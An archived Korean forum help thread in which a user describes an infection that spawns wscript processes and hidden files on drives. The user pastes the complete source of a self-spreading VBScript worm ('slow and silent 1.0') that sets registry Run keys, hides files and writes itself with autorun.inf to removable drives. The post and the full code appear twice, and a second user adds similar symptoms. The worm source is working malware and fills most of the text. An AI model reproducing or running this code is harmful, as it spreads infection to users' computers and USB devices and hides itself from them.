Q&A와 스터디
![[레벨:2]](http://old.lameproof.com/modules/point/icons/default/2.gif "포인트:593point (51%), 레벨:2/30"){kind=icon}
딸기우유언제부터인가 c드라이브를 제외한 드라이브를 열때마다 루트 디렉토리에 .ms32dll.dll 이란 파일이 생성됩니다.
거기에다 프로세스엔 wscript가 실행되는군요. 네이버 지식인에서 찾아보니 악성코드인거 같아
wscript 프로세스를 종료한 후 악성코드를 검사해도 안 잡히고, 여러가지로 골치입니다.
ms32dll 파일을 지우면 해당 드라이브를 열수도 없고 wcript는 드라이브를 열때마다 하나씩 실행되서
폴더검색을 많이하다보면 컴퓨터도 오류나는군요
또, usb메모리나 외장하드를 연결했다가 '하드웨어 안전하게 제거'를 눌러서 종료시키려고해도 wcript때문에
프로세스를 일일이 하나씩 종료후 제거해야됩니다.
레임분들중 아시는 분이 있으면 꼭 좀 알려주세요ㅜ
혹시몰라서 ms32dll파일 내용을 올립니다.
'marker
'slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
set rg = createobject("WScript.Shell")
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout","0"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&".MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunwinboot","wscript.exe "&winpath&"boot.ini"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt","1"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden","1"
dim text,size
size = mf.size
set text=mf.openastextstream(1,-2)
cc = text.readline
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & ".MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & ".MS32DLL.dll.vbs",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & ".MS32DLL.dll.vbs")
tf.attributes = 39
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "boot.ini")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "boot.ini",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "boot.ini")
tf.attributes = 39
if cc = "'mark" then
rg.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
if cc = "'marker" then
rg.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
do
for each flashdrive in fs.drives
hm="'mark"
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
if(flashdrive.drivetype=2) then
hm = "'marker"
end if
set tf=fs.getfile(flashdrive.path &".MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &".MS32DLL.dll.vbs",2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &".MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout","0"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&".MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunwinboot","wscript.exe /E:vbs "&winpath&"boot.ini"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt","1"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden","1"
next
if cc <> "'mark" then
Wscript.sleep 10000
end if
loop while cc <> "'mark"
거기에다 프로세스엔 wscript가 실행되는군요. 네이버 지식인에서 찾아보니 악성코드인거 같아
wscript 프로세스를 종료한 후 악성코드를 검사해도 안 잡히고, 여러가지로 골치입니다.
ms32dll 파일을 지우면 해당 드라이브를 열수도 없고 wcript는 드라이브를 열때마다 하나씩 실행되서
폴더검색을 많이하다보면 컴퓨터도 오류나는군요
또, usb메모리나 외장하드를 연결했다가 '하드웨어 안전하게 제거'를 눌러서 종료시키려고해도 wcript때문에
프로세스를 일일이 하나씩 종료후 제거해야됩니다.
레임분들중 아시는 분이 있으면 꼭 좀 알려주세요ㅜ
혹시몰라서 ms32dll파일 내용을 올립니다.
'marker
'slow and silent (sas)1.0
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
set rg = createobject("WScript.Shell")
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout","0"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&".MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunwinboot","wscript.exe "&winpath&"boot.ini"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt","1"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden","1"
dim text,size
size = mf.size
set text=mf.openastextstream(1,-2)
cc = text.readline
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & ".MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & ".MS32DLL.dll.vbs",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & ".MS32DLL.dll.vbs")
tf.attributes = 39
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "boot.ini")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "boot.ini",2,true)
tf.write "'ker"&vbcrlf&mysource
tf.close
set tf = fs.getfile(winpath & "boot.ini")
tf.attributes = 39
if cc = "'mark" then
rg.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
if cc = "'marker" then
rg.run winpath&"explorer.exe /e,/select, "&Wscript.ScriptFullname
end if
do
for each flashdrive in fs.drives
hm="'mark"
If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
if(flashdrive.drivetype=2) then
hm = "'marker"
end if
set tf=fs.getfile(flashdrive.path &".MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &".MS32DLL.dll.vbs",2,true)
tf.write hm&vbcrlf&mysource
tf.close
set tf=fs.getfile(flashdrive.path &".MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"autorun.inf")
tf.attributes=39
end if
rg.RegWrite "HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout","0"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMS32DLL",winpath&".MS32DLL.dll.vbs"
rg.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunwinboot","wscript.exe /E:vbs "&winpath&"boot.ini"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDriveTypeAutoRun",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden",1,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden",0,"REG_DWORD"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt","1"
rg.regwrite "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden","1"
next
if cc <> "'mark" then
Wscript.sleep 10000
end if
loop while cc <> "'mark"
![[레벨:8]](http://old.lameproof.com/modules/point/icons/default/8.gif "포인트:5818point (3%), 레벨:8/30"){kind=icon}
크리스
2007.11.02 15:09:13 (*.135.60.8)
![[레벨:4]](http://old.lameproof.com/modules/point/icons/default/4.gif "포인트:1818point (46%), 레벨:4/30"){kind=icon}
메서슈미트 요즘 이거 대유행하나보네요. 제가 일하는곳도 마찬가지인데 웃긴건 Autorun.inf도 MS32DLL.dll도 wscript.exe도 없는데 저 증세가 있습니다.
게다가 폴더 옵션에서 '숨김파일 및 폴더 표시'가 되지 않습니다. 확인하고 다시 들어가면 숨기기로 원위치되있더군요.
그리고 USB메모리의 용량을 계속 빨아먹는데 여기 깔린 바이로봇으로는 해결할 수가 없어서 주기적으로 데이터 백업하고 포맷해줘야 되네요.....물론 몇일 지나면 다시 풀.....
조만간 카스퍼스키 들고와서 뿌리를 뽑으려 했는데 이건 카스퍼스키로도 안되는건가요 (.........)
게다가 폴더 옵션에서 '숨김파일 및 폴더 표시'가 되지 않습니다. 확인하고 다시 들어가면 숨기기로 원위치되있더군요.
그리고 USB메모리의 용량을 계속 빨아먹는데 여기 깔린 바이로봇으로는 해결할 수가 없어서 주기적으로 데이터 백업하고 포맷해줘야 되네요.....물론 몇일 지나면 다시 풀.....
조만간 카스퍼스키 들고와서 뿌리를 뽑으려 했는데 이건 카스퍼스키로도 안되는건가요 (.........)
2013.05.19 13:35:09 (*.153.235.115)
![[레벨:3]](http://old.lameproof.com/modules/point/icons/default/3.gif "포인트:962point (24%), 레벨:3/30"){kind=icon}
bestbasci01@yahoo.com
